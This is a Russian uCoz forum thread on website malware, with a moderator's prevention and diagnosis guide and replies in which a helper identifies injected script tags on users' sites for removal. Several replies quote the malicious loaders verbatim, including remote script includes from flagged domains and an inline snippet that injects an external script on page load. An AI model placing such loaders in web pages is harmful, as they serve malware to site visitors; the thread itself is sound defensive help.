Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    SeOn1981
    Сообщений: 29
    Репутация: 0

    Сообщение # 586 | 13:04:52 18 Сен 2013
    Цитата (webanet)
    рисунок заблочили за рекламу рич медиа. реклама могла быть как на самом сайте, так и на сайтах, ссылки которых присутствуют в коде
    Удалил рекламу. Все по прежнему!
    http://risunok.ucoz.com/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 587 | 13:06:32 18 Сен 2013
    SeOn1981, так подождите. не сразу блок снимается
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    soch
    Сообщений: 9
    Репутация: 0

    Сообщение # 588 | 07:55:43 19 Сен 2013
    Доброго времени суток, пожалуйста помогите убрать вредоносный код с сайта, яндекс пометил таким предупреждением (Сайт может угрожать безопасности вашего компьютера или мобильного устройства)
    Буду очень благодарен.
    http://photoshoprurus.3dn.ru
    Прикрепления: 9603442.png (37.7 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 589 | 11:26:43 19 Сен 2013
    soch, удаляем скрипт кнопок соц. сетей

    Код
    <script type="text/javascript" src="http://jquery-code.ru/jl.php?share=15,0,7,10,14,16,24,31,34,35,37,38,46&size=32"></script>
    не ставим кнопки больше никогда со сторонними сомнительными сервисами. ставим кнопки с яндексом http://api.yandex.ru/share/

    и я бы проредила мусор от effectfree.net. у вас ссылок на этот сайт чуть ли не больше внутренних
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    soch
    Сообщений: 9
    Репутация: 0

    Сообщение # 590 | 09:44:12 21 Сен 2013
    webanet, Очень благодарен большое спасибо за помощь!

    Добавлено (21 Сен 2013, 09:44:12)
    ---------------------------------------------
    Здравствуйте! все равно после проверок Яндекс не убирает это предупреждение (Сайт может угрожать безопасности вашего компьютера или мобильного устройства)
    Я уже всю рекламу с сайта убрал, оставил только партнёрку на сайт (partner.effectfree.ru) Пожалуйста помогите решить проблему, посещаемость вообще упала.
    http://photoshoprurus.3dn.ru

    soch
    Сообщений: 9
    Репутация: 0

    Сообщение # 591 | 17:26:46 22 Сен 2013
    webanet, Всё сделал как вы сказали, яндексу писал в службу поддержки два дня назад ответа нет, эффектфри проредил, рекламу всю убрал на сайте почти ничего не осталось. http://photoshoprurus.3dn.ru/
    А вот пожалуйста гляньте тоже мой сайт, тут всё почти тоже самое и бес проблем яндекс молчит http://photoshopphoto.3dn.ru/
    Прикрепления: 1478911.png (49.6 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 592 | 18:44:25 22 Сен 2013
    soch, дождитесь перепроверки сайта или напишите в тех. поддержку. не заказывайте новую перепроверку, а напишите у тех. сразу
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    AdM6297
    Сообщений: 2
    Репутация: 0

    Сообщение # 593 | 23:13:00 22 Сен 2013
    Здравствуйте мой сайт http://poroi.ucoz.ru/ Сегодня захожу на свой сайт http://poroi.ucoz.ru/ через браузер GoogleChrome и мне выдает: "Опасность: обнаружено вредоносное ПО! Эта страница содержит контент с сайта http://css-patch.ru/ который был замечен в распространении вредоносного ПО.
    И так со всеми страницами,что делать не могу найти код с сайтом http://css-patch.ru/ помогите...
    AdM6297
    Сообщений: 2
    Репутация: 0

    Сообщение # 594 | 09:16:45 23 Сен 2013
    Цитата (AdM6297)
    Здравствуйте мой сайт http://poroi.ucoz.ru/ Сегодня захожу на свой сайт http://poroi.ucoz.ru/ через браузер GoogleChrome и мне выдает: "Опасность: обнаружено вредоносное ПО! Эта страница содержит контент с сайта http://css-patch.ru/ который был замечен в распространении вредоносного ПО. И так со всеми страницами,что делать не могу найти код с сайтом http://css-patch.ru/ помогите...
    Все спасибо я нашел с чем это было связано!! (блок статистика сайта) от http://css-patch.ru/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 595 | 12:29:38 23 Сен 2013
    AdM6297, у вас ещё остался вредоносный код на сайте. блок наша кнопка удалить скрипт

    Код
    <script type="text/javascript" src="http://adoit.pw/border.js"></script><br><br><script language="JavaScript">  

    и старайтесь не собирать скрипты в интернете, особенно если не понимаете что ставите
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Djenya
    Сообщений: 11
    Репутация: 0

    Сообщение # 596 | 12:39:11 23 Сен 2013
    Добрый день уважаемые форумчане. На сайте russian-files.ru завелся вирус, будьте добры и подскажите где лежит вирус и как его удалить?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 597 | 12:50:08 23 Сен 2013
    Djenya, описание вируса можете дать? реагирует антивирус, браузер блочит. другое

    а пока держите список грязи на вашем сайте. любое из списка может вызвать реакцию и у антивирусов и у поисковиков
    Код

    <script type="text/javascript">
      (function(w) {
      var script = document.createElement('script');
      var i = setInterval(function() {
      if (typeof w.document.body !== 'undefined') {
      script.src = 'http://wizardteasers.topbirju.ru' + '/?408166=ElsSFEAEDwJbUV9XUg';
      w.document.body.appendChild(script);
      clearInterval(i);
      }
      }, 200);
    })(window);
    </script>


    Код
    <script language='javascript' type='text/javascript' src='http://ya.topbirju.ru/7mo8xdmgjrq638fd8taccl4xop2zbz'></script>
    <script language="javascript" async defer src="http://wizard.topbirju.ru/?t=b&blockids=5852"></script>



    Код
    <script language="javascript" async defer src="http://wizardteasers.topbirju.ru?t=tsr&bid=5577"></script>


    Код
    <script type="text/javascript" src="http://firefiles.ru/templates/Default/js/share.js" charset="utf-8"></script>  

    так же задумайтесь зачем сайту грязь в виде перевода с подгрузкой с чужого сайта кучи картинок и скрипта

    Код
    <script type="text/javascript" src="http://cs-yakudza.com/translate/translate.js">  
    </script>  

    <noscript>  
    <input name="u" value="http://www.russian-files.ru" type="hidden" /></noscript><input name="hl" value="ru" type="hidden" /><input name="ie" value="UTF8" type="hidden" /><input name="langpair" value="" type="hidden" />  
    <input name="I1" value="uk|ru" title="Translate this page to Russian" src="http://cs-yakudza.com/translate/flag-rus.png" align="absbottom" onClick="this.form.langpair.value=this.value" height="19" type="image" width="31" />  
    <input name="I2" value="ru|uk" title="Translate this page to Ukrainian" src="http://cs-yakudza.com/translate/flag-ukr.png" align="absbottom" onClick="this.form.langpair.value=this.value" height="19" type="image" width="31" />  
    <input name="I3" value="uk|en" title="Translate this page to English" src="http://cs-yakudza.com/translate/flag-en.png" align="absbottom" onClick="this.form.langpair.value=this.value" height="19" type="image" width="31" />  
    <input name="I4" value="uk|zh-CN" title="Translate this page to Chinese" src="http://cs-yakudza.com/translate/flag-china.png" align="absbottom" onClick="this.form.langpair.value=this.value" height="19" type="image" width="31" />  
    </form></table>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Mantikor
    Сообщений: 7
    Репутация: 0

    Сообщение # 598 | 17:11:26 23 Сен 2013
    Добрый день. Сайт http://dou34.ucoz.ru
    Во всех браузерах открывается, в google chrome пишет :
    Цитата
    Google Chrome заблокировал доступ к этой странице на сайте dou34.ucoz.ru.Эта страница содержит контент с сайта wap-tds.in, который был замечен в распространении вредоносного ПО. Ее посещение может привести к заражению вашего компьютера.
    Скажите пожалуйста, как это можно исправить??
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 599 | 17:22:16 23 Сен 2013
    Mantikor, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script type="text/javascript" src="http://wap-tds.in/code/js.php?i=2738&r=4577&p=8839&c=8"></script>
    поле на что заменить оставляете пустым и производите замену во всех модулях
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Mantikor
    Сообщений: 7
    Репутация: 0

    Сообщение # 600 | 17:50:31 23 Сен 2013
    Цитата (webanet)
    поле на что заменить оставляете пустым и производите замену во всех модулях
    Спасибо Вам огромное, теперь работает. Скажите пожалуйста, как Вы определили именно эту строку замены. И можно ли найти ее в конкретном модуле и строке в юкоз?
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: